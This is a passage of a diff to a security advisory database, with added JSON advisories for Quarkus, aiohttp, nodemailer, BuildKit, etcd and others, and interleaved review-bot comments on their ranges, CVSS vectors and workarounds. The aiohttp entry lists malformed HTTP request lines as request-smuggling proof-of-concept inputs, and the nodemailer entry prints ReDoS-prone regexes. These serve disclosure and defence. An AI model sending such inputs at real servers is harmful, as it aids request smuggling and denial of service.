"severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-02-05T17:59:41Z", + "nvd_published_at": "2024-01-04T10:15:11Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json b/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json new file mode 100644 index 0000000000000..ab381d2d8edbb --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8j3x-w35r-rw4r/GHSA-8j3x-w35r-rw4r.json 
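Review bot: The advisory gives no remediation beyond the version bump, but the described flaw surfaces the raw GitLab token in a frontend error, so any token ever entered through catalog-import on an unpatched instance must be treated as exposed. Suggest adding to `details`: `Operators upgrading should also rotate any GitLab access tokens used with catalog-import, since a leaked token may already have been captured from UI error output or browser/proxy logs.` Also confirm the package: the text describes a frontend (catalog-import) leak while the only `affected` entry is the backend package `@backstage/backend-app-api`; if PR 21582 also touched plugin packages, they need their own entries.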
@@ -0,0 +1,85 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8j3x-w35r-rw4r", + "modified": "2024-01-31T22:38:58Z", + "published": "2024-01-25T21:32:14Z", + "aliases": [ + "CVE-2023-6267" + ], + "summary": "Quarkus Improper Handling of Insufficient Permissions or Privileges and Improper Handling of Exceptional Conditions vulnerability", + "details": "A flaw was found in the json payload. If annotation based security is used to secure a REST resource, the JSON body that the resource may consume is being processed (deserialized) prior to the security constraints being evaluated and applied. This does not happen with configuration based security.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Maven", + "name": "io.quarkus.resteasy.reactive:resteasy-reactive" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.13.9.Final" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Maven", + "name": "io.quarkus.resteasy.reactive:resteasy-reactive" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.0.0.Final" + }, + { + "fixed": "3.2.9.Final" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-6267" + }, + { + "type": "WEB", + "url": "https://access.redhat.com/security/cve/CVE-2023-6267" + }, + { + "type": "WEB", + "url": "https://bugzilla.redhat.com/show_bug.cgi?id=2251155" + }, + { + "type": "PACKAGE", + "url": "https://github.com/quarkusio/quarkus" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-280", + "CWE-755" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:38:58Z", + "nvd_published_at": "2024-01-25T19:15:08Z" + } +} \ No newline at end of file 
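Review bot: The two ranges leave gaps: `0`→`2.13.9.Final` and `3.0.0.Final`→`3.2.9.Final` imply that 2.14.x–2.16.x and everything from 3.3.0 onward are unaffected, yet nothing in the details or references says those lines were patched — only the two LTS backports are named. If the flaw was present until a later 3.x fix (hedged, since no upstream fix commit is referenced), a third range with `"introduced": "3.3.0"` and the real fixed version is needed, and 2.14–2.16 should be listed as affected with `last_affected`. The details also imply a workaround that deserves its own sentence: `Workaround: until upgraded, declare the resource's authorization through configuration-based security (quarkus.http.auth.permission.*) instead of annotations, which applies the checks before the body is read.`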
diff --git a/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json b/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json new file mode 100644 index 0000000000000..ad729797cc557 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8qpw-xqxj-h4r2/GHSA-8qpw-xqxj-h4r2.json 
@@ -0,0 +1,89 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8qpw-xqxj-h4r2", + "modified": "2024-02-06T22:12:06Z", + "published": "2024-01-29T22:30:07Z", + "aliases": [ + "CVE-2024-23829" + ], + "summary": "aiohttp's HTTP parser (the python one, not llhttp) still overly lenient about separators", + "details": "### Summary\nSecurity-sensitive parts of the *Python HTTP parser* retained minor differences in allowable character sets, that must trigger error handling to robustly match frame boundaries of proxies in order to protect against injection of additional requests. Additionally, validation could trigger exceptions that were not handled consistently with processing of other malformed input.\n\n### Details\nThese problems are rooted in pattern matching protocol elements, previously improved by PR #3235 and GHSA-gfw2-4jvh-wgfg:\n\n1. The expression `HTTP/(\\d).(\\d)` lacked another backslash to clarify that the separator should be a literal dot, not just *any* Unicode code point (result: `HTTP/(\\d)\\.(\\d)`).\n\n2. The HTTP version was permitting Unicode digits, where only ASCII digits are standards-compliant.\n\n3. Distinct regular expressions for validating HTTP Method and Header field names were used - though both should (at least) apply the common restrictions of rfc9110 `token`.\n\n### PoC\n`GET / HTTP/1ö1`\n`GET / HTTP/1.𝟙`\n`GET/: HTTP/1.1`\n`Content-Encoding?: chunked`\n\n### Impact\nPrimarily concerns running an aiohttp server without llhttp:\n 1. **behind a proxy**: Being more lenient than internet standards require could, depending on deployment environment, assist in request smuggling.\n 2. 
**directly accessible** or exposed behind proxies relaying malformed input: the unhandled exception could cause excessive resource consumption on the application server and/or its logging facilities.\n\n-----\n\nPatch: https://github.com/aio-libs/aiohttp/pull/8074/files", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "PyPI", + "name": "aiohttp" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.9.2" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-8qpw-xqxj-h4r2" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/security/advisories/GHSA-gfw2-4jvh-wgfg" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23829" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/3235" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8074" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/pull/8074/files" + }, + { + "type": "WEB", + "url": "https://github.com/aio-libs/aiohttp/commit/33ccdfb0a12690af5bb49bda2319ec0907fa7827" + }, + { + "type": "PACKAGE", + "url": "https://github.com/aio-libs/aiohttp" + }, + { + "type": "WEB", + "url": "https://github.com/pypa/advisory-database/tree/main/vulns/aiohttp/PYSEC-2024-26.yaml" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/XXWVZIVAYWEBHNRIILZVB3R3SDQNNAA7/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-444" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-29T22:30:07Z", + "nvd_published_at": "2024-01-29T23:15:08Z" + } +} \ No newline at end of file 
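Review bot: The Impact section says the problem only bites when the pure-Python parser is active, but the advisory never tells operators how to check which parser they are running or how to force the safe one — the first thing a reader pinned to 3.9.1 needs. Suggest a `### Workarounds` paragraph: `Until 3.9.2 is deployed, make sure the C (llhttp) parser is in use: install aiohttp from a binary wheel for your platform and do not set AIOHTTP_NO_EXTENSIONS; builds without the extension fall back to the vulnerable Python parser.` (Variable name from memory — confirm against aiohttp's build docs.) The PoC request lines should be fenced as code in the markdown so the non-ASCII digits survive rendering.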
diff --git a/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json b/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json index f9d5579c724e5..8406d5a82396e 100644 --- a/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json +++ b/advisories/github-reviewed/2024/01/GHSA-8r93-59cf-358f/GHSA-8r93-59cf-358f.json @@ -1,15 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-8r93-59cf-358f", - "modified": "2024-01-24T21:50:26Z", + "modified": "2024-01-31T21:46:14Z", "published": "2024-01-24T18:31:02Z", "aliases": [ "CVE-2024-23902" ], "summary": "CSRF vulnerability in Jenkins GitLab Branch Source Plugin", - "details": "A cross-site request forgery (CSRF) vulnerability in Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier allows attackers to connect to an attacker-specified URL.", + "details": "Jenkins GitLab Branch Source Plugin 684.vea_fa_7c1e2fe3 and earlier does not require POST requests for a form validation endpoint, resulting in a cross-site request forgery (CSRF) vulnerability.\n\nThis vulnerability allows attackers to connect to an attacker-specified URL.\n\nGitLab Branch Source Plugin 688.v5fa_356ee8520 requires POST requests for the affected form validation endpoint.", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json b/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json new file mode 100644 index 0000000000000..d93e2b70684bb --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-8xw6-9h78-c89j/GHSA-8xw6-9h78-c89j.json 
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-8xw6-9h78-c89j", + "modified": "2024-02-05T21:04:52Z", + "published": "2024-01-30T03:30:30Z", + "aliases": [ + "CVE-2023-51837" + ], + "summary": "Ylianst MeshCentral Missing SSL Certificate Validation", + "details": "Ylianst MeshCentral 1.1.16 is vulnerable to Missing SSL Certificate Validation.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "meshcentral" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "last_affected": "1.1.16" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51837" + }, + { + "type": "PACKAGE", + "url": "https://github.com/Ylianst/MeshCentral" + }, + { + "type": "WEB", + "url": "https://github.com/Ylianst/MeshCentral/blob/master/mpsserver.js" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/Bug_MeshCentral.md" + }, + { + "type": "WEB", + "url": "https://github.com/tianjk99/Cryptographic-Misuses/blob/main/CVE-2023-51837.md" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-295" + ], + "severity": "CRITICAL", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T18:44:28Z", + "nvd_published_at": "2024-01-30T01:15:58Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json b/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json new file mode 100644 index 0000000000000..4d97682c8619a --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-997g-27x8-43rf/GHSA-997g-27x8-43rf.json 
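Review bot: The only code reference is `blob/master/mpsserver.js` with no line or commit, so it will silently drift as the file changes and already says nothing about which TLS connection is unverified; the sibling stf advisory in this same commit pins `a6b5f18…/lib/util/vncauth.js#L35`, and this one should do the same with a permalink at the 1.1.16 tag to the TLS-options line. The one-line details should also name the affected connection (the MPS/CIRA server, judging by the file name — hedged) so operators can judge exposure. Since the range is `last_affected: 1.1.16` with no `fixed`, state explicitly that no patched release is known.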
@@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-997g-27x8-43rf", + "modified": "2024-01-30T21:34:04Z", + "published": "2024-01-30T20:57:22Z", + "aliases": [ + "CVE-2024-24558" + ], + "summary": "react-query-streamed-hydration Cross-site Scripting vulnerability", + "details": "### Impact\n\nThe `@tanstack/react-query-next-experimental` NPM package is vulnerable to a cross-site scripting vulnerability. To exploit this, an attacker would need to either inject malicious input or arrange to have malicious input be returned from an endpoint.\n\nThis vulnerability arises from improper handling of untrusted input when `@tanstack/react-query-next-experimental` performs server-side rendering of HTML pages. To fix this vulnerability, we implemented appropriate escaping to prevent javascript injection into rendered pages.\n\n### Patches\n\nTo fix this issue, please update to version 5.18.0 or later.\n\n### Workarounds\n\nThere are no known workarounds for this issue. Please update to version 5.18.0 or later.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:L/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "@tanstack/react-query-next-experimental" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "5.0.0" + }, + { + "fixed": "5.18.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/TanStack/query/security/advisories/GHSA-997g-27x8-43rf" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-24558" + }, + { + "type": "WEB", + "url": "https://github.com/TanStack/query/commit/f2ddaf2536e8b71d2da88a9310ac9a48c13512a1" + }, + { + "type": "PACKAGE", + "url": "https://github.com/TanStack/query" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-79" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T20:57:22Z", + "nvd_published_at": 
"2024-01-30T20:15:45Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json b/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json index 27be8ce0c944d..4f72e4fdb8833 100644 --- a/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json +++ b/advisories/github-reviewed/2024/01/GHSA-9f9p-cp3c-72jf/GHSA-9f9p-cp3c-72jf.json @@ -86,7 +86,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-113" + "CWE-113", + "CWE-436" ], "severity": "MODERATE", "github_reviewed": true, diff --git a/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json new file mode 100644 index 0000000000000..5e46639db3f2a --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9h6g-pr28-7cqp/GHSA-9h6g-pr28-7cqp.json 
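Review bot: The `summary` names `react-query-streamed-hydration`, a package that appears nowhere in `affected` or in the details, which consistently talk about `@tanstack/react-query-next-experimental`; advisory search and notifications key off the summary, so it should match: `"summary": "@tanstack/react-query-next-experimental Cross-site Scripting vulnerability"`. The vector `UI:N` with `C:H/I:L` is also unusual for an XSS injected during SSR (typically `UI:R` and scope-changed); worth re-checking against the upstream GHSA before it propagates.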
@@ -0,0 +1,72 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9h6g-pr28-7cqp", + "modified": "2024-01-31T22:42:54Z", + "published": "2024-01-31T22:42:54Z", + "aliases": [ + + ], + "summary": "nodemailer ReDoS when trying to send a specially crafted email", + "details": "### Summary\nA ReDoS vulnerability occurs when nodemailer tries to parse img files with the parameter `attachDataUrls` set, causing the stuck of event loop. \nAnother flaw was found when nodemailer tries to parse an attachments with a embedded file, causing the stuck of event loop. \n\n### Details\n\nRegex: /^data:((?:[^;]*;)*(?:[^,]*)),(.*)$/\n\nPath: compile -> getAttachments -> _processDataUrl\n\nRegex: /(]* src\\s*=[\\s\"']*)(data:([^;]+);[^\"'>\\s]+)/\n\nPath: _convertDataImages\n\n### PoC\n\nhttps://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6\nhttps://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698\n\n### Impact\n\nReDoS causes the event loop to stuck a specially crafted evil email can cause this problem.\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "npm", + "name": "nodemailer" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "6.9.9" + } + ] + } + ], + "database_specific": { + "last_known_affected_version_range": "<= 6.9.8" + } + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/nodemailer/nodemailer/security/advisories/GHSA-9h6g-pr28-7cqp" + }, + { + "type": "WEB", + "url": "https://github.com/nodemailer/nodemailer/commit/dd8f5e8a4ddc99992e31df76bcff9c590035cd4a" + }, + { + "type": "WEB", + "url": "https://gist.github.com/francoatmega/890dd5053375333e40c6fdbcc8c58df6" + }, + { + "type": "WEB", + "url": "https://gist.github.com/francoatmega/9aab042b0b24968d7b7039818e8b2698" + }, + { + "type": "PACKAGE", + "url": "https://github.com/nodemailer/nodemailer" + } + ], + 
"database_specific": { + "cwe_ids": [ + "CWE-1333" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:42:54Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json b/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json new file mode 100644 index 0000000000000..e5940363132e3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9p26-698r-w4hx/GHSA-9p26-698r-w4hx.json 
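Review bot: The second regex in `details`, `/(]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/`, is not a valid pattern — the opening group begins with `]*`, which looks like `<img[^>` was stripped as an HTML tag when the upstream advisory was rendered — so a reader grepping the codebase for it will not find it. Replace it with the pattern from the referenced fix commit (presumably `/(<img[^>]* src\s*=[\s"']*)(data:([^;]+);[^"'>\s]+)/`) and fence both regexes as code so this does not recur. The details describe two distinct sinks (`attachDataUrls` and embedded images in HTML), which the summary could name so triage does not assume only one path.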
@@ -0,0 +1,69 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9p26-698r-w4hx", + "modified": "2024-02-01T17:48:10Z", + "published": "2024-01-31T22:43:54Z", + "aliases": [ + "CVE-2024-23650" + ], + "summary": "BuildKit vulnerable to possible panic when incorrect parameters sent from frontend", + "details": "### Impact\nA malicious BuildKit client or frontend could craft a request that could lead to BuildKit daemon crashing with a panic.\n\n### Patches\nThe issue has been fixed in v0.12.5\n\n### Workarounds\nAvoid using BuildKit frontends from untrusted sources. A frontend image is usually specified as the `#syntax` line on your Dockerfile, or with `--frontend` flag when using `buildctl build` command. \n\n### References\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/moby/buildkit" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "0.12.5" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/security/advisories/GHSA-9p26-698r-w4hx" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-23650" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/pull/4601" + }, + { + "type": "PACKAGE", + "url": "https://github.com/moby/buildkit" + }, + { + "type": "WEB", + "url": "https://github.com/moby/buildkit/releases/tag/v0.12.5" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-754" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:54Z", + "nvd_published_at": "2024-01-31T22:15:53Z" + } +} \ No newline at end of file 
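Review bot: The Impact paragraph names two attackers, `a malicious BuildKit client or frontend`, but the Workarounds cover only untrusted frontends; nothing is said about the client side, where anyone who can reach the buildkitd socket or TCP endpoint can crash the daemon. Add a sentence such as `Restrict access to the buildkitd API (unix socket permissions, or mTLS on TCP listeners) to trusted clients until v0.12.5 is deployed.` The empty `### References` heading at the end of `details` should either be dropped or filled with the fix PR (#4601), which is already in `references`.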
diff --git a/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json b/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json new file mode 100644 index 0000000000000..e1197d816f105 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-9xc9-xq7w-vpcr/GHSA-9xc9-xq7w-vpcr.json @@ -0,0 +1,65 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-9xc9-xq7w-vpcr", + "modified": "2024-01-31T22:43:09Z", + "published": "2024-01-31T09:30:18Z", + "aliases": [ + "CVE-2023-44313" + ], + "summary": "Apache ServiceComb Service-Center Server-Side Request Forgery vulnerability", + "details": "Server-Side Request Forgery (SSRF) vulnerability in Apache ServiceComb Service-Center. Attackers can obtain sensitive server information through specially crafted requests.This issue affects Apache ServiceComb before 2.1.0 (included). Users are recommended to upgrade to version 2.2.0, which fixes the issue.\n\n", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:L/A:L" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/apache/servicecomb-service-center" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "2.2.0" + } + ] + } + ] + } + ], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-44313" + }, + { + "type": "PACKAGE", + "url": "https://github.com/apache/servicecomb-service-center" + }, + { + "type": "WEB", + "url": "https://lists.apache.org/thread/kxovd455o9h4f2v811hcov2qknbwld5r" + }, + { + "type": "WEB", + "url": "http://www.openwall.com/lists/oss-security/2024/01/31/4" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-918" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2024-01-31T22:43:09Z", + "nvd_published_at": "2024-01-31T09:15:43Z" + } +} \ No newline at end of file 
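Review bot: The vector carries `UI:R`, but the description is a server-side request forgery triggered by `specially crafted requests` sent to Service-Center itself; no second user's action is described, so `UI:N` (with the corresponding score change) looks right — confirm against the Apache thread before editing. The details also say `before 2.1.0 (included)` while the range is fixed only at `2.2.0`; if any 2.1.x patch release exists it is silently flagged vulnerable, so either state that every 2.1.x release is affected or narrow the range.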
diff --git a/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json b/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json index 3332b309e0220..0d0e921be0363 100644 --- a/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json +++ b/advisories/github-reviewed/2024/01/GHSA-c3c6-f2ww-xfr2/GHSA-c3c6-f2ww-xfr2.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c3c6-f2ww-xfr2", - "modified": "2024-01-24T20:55:31Z", + "modified": "2024-01-31T14:55:56Z", "published": "2024-01-24T15:30:30Z", "aliases": [ "CVE-2023-50943" @@ -9,7 +9,10 @@ "summary": "Apache Airflow: pickle deserialization vulnerability in XComs", "details": "Apache Airflow, versions before 2.8.1, have a vulnerability that allows a potential attacker to poison the XCom data by bypassing the protection of \"enable_xcom_pickling=False\" configuration setting resulting in poisoned data after XCom deserialization. This vulnerability is considered low since it requires a DAG author to exploit it. Users are recommended to upgrade to version 2.8.1 or later, which fixes this issue.\n", "severity": [ - + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N" + } ], "affected": [ { diff --git a/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json b/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json new file mode 100644 index 0000000000000..f41ca380906c3 --- /dev/null +++ b/advisories/github-reviewed/2024/01/GHSA-chh6-ppwq-jh92/GHSA-chh6-ppwq-jh92.json 
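Review bot: The vector just added carries `PR:N`, which contradicts the details one line above it: the issue `requires a DAG author to exploit it` and is rated low for that reason, and a DAG author is an authenticated, fairly privileged user — `PR:L` at minimum, `PR:H` if DAG authoring is treated as admin-level. Suggest `"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:H/A:N"`, which also brings the number closer to the upstream "low" wording, and revisit the `severity` field accordingly.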
@@ -0,0 +1,88 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-chh6-ppwq-jh92", + "modified": "2024-01-30T23:54:26Z", + "published": "2024-01-30T23:54:26Z", + "aliases": [ + "CVE-2020-15113" + ], + "summary": "Improper Preservation of Permissions in etcd", + "details": "### Vulnerability type\nAccess Controls\n\n### Detail\netcd creates certain directory paths (etcd data directory and the directory path when provided to automatically generate self-signed certificates for TLS connections with clients) with restricted access permissions (700) by using the os.MkdirAll. This function does not perform any permission checks when a given directory path exists already.\n### Specific Go Package Affected\ngithub.com/etcd-io/etcd/pkg/fileutil\n### Workarounds\nMake sure these directories have the desired permit (700).\n\n### References\nFind out more on this vulnerability in the [security audit report](https://github.com/etcd-io/etcd/blob/master/security/SECURITY_AUDIT.pdf)\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Contact the [etcd security committee](https://github.com/etcd-io/etcd/blob/master/security/security-release-process.md#product-security-committee-psc)", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:H/PR:H/UI:N/S:U/C:H/I:H/A:N" + } + ], + "affected": [ + { + "package": { + "ecosystem": "Go", + "name": "github.com/etcd-io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "3.4.0-rc.0" + }, + { + "fixed": "3.4.10" + } + ] + } + ] + }, + { + "package": { + "ecosystem": "Go", + "name": "github.com/etcd-io/etcd" + }, + "ranges": [ + { + "type": "ECOSYSTEM", + "events": [ + { + "introduced": "0" + }, + { + "fixed": "3.3.23" + } + ] + } + ] + } + ], + "references": [ + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/security/advisories/GHSA-chh6-ppwq-jh92" + }, + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2020-15113" + }, + { 
+ "type": "WEB", + "url": "https://github.com/etcd-io/etcd/commit/6be5c54c94298ae6746a574d2af8227d0c9a998b" + }, + { + "type": "WEB", + "url": "https://github.com/etcd-io/etcd/commit/e5424fc474b274c9e6b5205165015bc2035745f2" + }, + { + "type": "WEB", + "url": "https://lists.fedoraproject.org/archives/list/package-announce@lists.fedoraproject.org/message/L6B6R43Y7M3DCHWK3L3UVGE2K6WWECMP/" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-281" + ], + "severity": "MODERATE", + "github_reviewed": true, + "github_reviewed_at": "2024-01-30T23:54:26Z", + "nvd_published_at": "2020-08-05T20:15:00Z" + } +} \ No newline at end of file diff --git a/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json b/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json index 3b4584774e21f..962f40c8c51d8 100644 --- a/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json +++ b/advisories/github-reviewed/2024/01/GHSA-chj7-w3f6-cvfj/GHSA-chj7-w3f6-cvfj.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-chj7-w3f6-cvfj", - "modified": "2024-01-23T14:41:50Z", + "modified": "2024-01-29T16:25:04Z", "published": "2024-01-20T21:30:25Z", "aliases": [ "CVE-2024-0521" @@ -40,6 +40,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-0521" }, + { + "type": "PACKAGE", + "url": "https://github.com/PaddlePaddle/Paddle" + }, { "type": "WEB", "url": "https://huntr.com/bounties/a569c64b-1e2b-4bed-a19f-47fd5a3da453" diff --git a/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json b/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json index 4339a1f2861e2..6db8af5445f02 100644 --- a/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json +++ b/advisories/github-reviewed/2024/01/GHSA-cjgm-9vc9-56mx/GHSA-cjgm-9vc9-56mx.json 
